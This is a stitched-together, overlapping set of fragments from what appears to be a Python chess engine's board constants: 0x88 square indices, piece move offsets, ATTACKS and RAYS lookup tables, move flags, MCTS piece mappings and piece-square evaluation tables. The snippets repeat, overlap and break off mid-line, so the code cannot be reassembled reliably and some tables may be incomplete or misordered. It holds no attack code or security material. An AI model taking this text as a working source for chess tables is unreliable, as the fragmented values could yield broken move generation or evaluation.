-0.5, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2,", "} KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],", "'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6':", "33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39,", "WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP", "'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = 
['1-0', '0-1',", "0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0,", "EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK", "0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,", "82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96,", "'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3':", "0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,", "} MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS =", "0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16,", "} FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION':", "4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7", "37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51,", "0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17,", "-15] } # Directions different pieces can move PIECE_OFFSETS = { 'n': [-18,", "15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0,", "'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4':", "-2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0,", "-2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL =", "-0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0,", "0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0,", "'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0,", "0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0,", "= 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP =", "-3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0,", "31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q':", "'w' : 1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0,", "0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0,", "-4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [", "1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64", "0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0,", "1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], 
[ -0.5, 0.0, 0.0, 0.0, 0.0,", "0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0,", "= 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT =", "'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE':", "0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0,", "= 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0',", "CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN =", "-1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0,", "0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0,", "0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0,", "-1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0,", "2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8':", "] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0,", "14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17,", "0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [", "w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0,", "-1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0,", "(capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17,", "15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING", "1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0,", "-1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0,", "'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1':", "-32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS = {", "[ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0,", "'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = {", "KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING", "0, 0, 
24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0,", "= { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE':", "1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0,", "[-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0,", "'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4,", "-0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0,", "0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0,", "5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5,", "0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0,", "2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16,", "0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0,", "0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0,", "4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0", "= [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5,", "0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1,", "2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0],", "0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15,", "0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0,", "= 'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION =", "0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16,", "0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "-4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0,", "'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2':", "-4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0],", "24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0,", "100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114,", "0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 =", "-14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': 
[-16, 1,", "[{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [", "0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0,", "0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0,", "SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4,", "-31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16,", "0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0,", "BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0,", "0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0,", "MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' : 3, 'r'", "56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0,", "-1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16,", "0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20,", "0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0,", "[ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0,", ": 'b', 4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP", "18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16,", "'d4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3':", "24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0,", "2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0],", "'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 }", "67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81,", "16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,", "0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0,", "} ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}],", "16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17,", "SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square':", "101, 'g2': 
102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115,", "0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0,", "0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]", "1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15,", "0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0,", "= 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq", "5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0,", "0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0,", "0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r':", "-1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17,", "0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b':", "2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ]", "0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5,", "3 : 'b', 4 : 'r', 5 : 'q', 6 : 'k' }", "0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16,", "1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5,", "0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0,", "0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0,", "0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5,", "1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5,", "1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0,", "16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] }", "= { 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17,", "17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0,", "0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0,", "'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2", "-1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1':", "0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 
} FLAGS", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0,", "[-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15],", "'b', 4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP =", ": -1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24,", "0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7':", "[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0,", "0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0,", "0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0,", "0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0,", "0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0,", "0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0,", "0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0,", "KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns", "2 : 'n', 3 : 'b', 4 : 'r', 5 : 'q', 6", "2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n',", "0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0,", "[ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0,", "[0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0,", "KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [", "{ 'p' : 1, 'n' : 2, 'b' : 3, 'r' : 4,", "0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0,", "0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [", "] RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0,", "0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5,", "-4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [", "'w': [-16, -32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS", "2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1", "0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24,", "RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 
RANK_8", "0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0,", "1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k':", "'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15,", "21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35,", "1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32,", "'p' : 1, 'n' : 2, 'b' : 3, 'r' : 4, 'q'", "0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0,", "22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36,", "0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0,", "56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0,", "ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION", "1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5,", "0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24,", "1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0],", "0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5],", "-3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54,", "69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83,", "0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0,", "-0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5,", "20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34,", "-2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5,", "[-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1,", "0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0,", "'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] #", "0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0,", "24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1,", 
"-15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17", "} # Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33,", "0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0,", "'d1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS =", "{'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0,", "-3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0,", "35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49,", "0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20,", "0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0,", "-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0],", "-1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL =", "0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0,", "'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6':", "-2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 : 'b', 4", "[-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0,", "= { 1 : 'p', 2 : 'n', 3 : 'b', 4 :", "= { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8':", "= { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k':", "RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5", "'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']},", "0,20 ] RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16,", "ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b':", "{ 'w' : 1, 'b' : -1 } ATTACKS = [ 20,0, 0,", "= [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0,", "'0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2, right", "0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0,", "= 'b' ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS =", "[-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1],", "103, 'a1': 112, 'b1': 113, 
'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117,", "'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS", "5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0,", "-1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5,", "-0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0,", "[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0,", "1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0,", "RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24,", "0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0,", "0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0,", "-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5,", "0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0,", "# BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1", "1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = {", "0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "'d8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7':", "'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2':", "53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7", "'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL':", "0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17,", "0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0,", "0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0,", "1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [", "'k' : 6, } MCTS_DECODER = { 1 : 'p', 2 : 'n',", "0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0,", "0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0,", "'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5':", 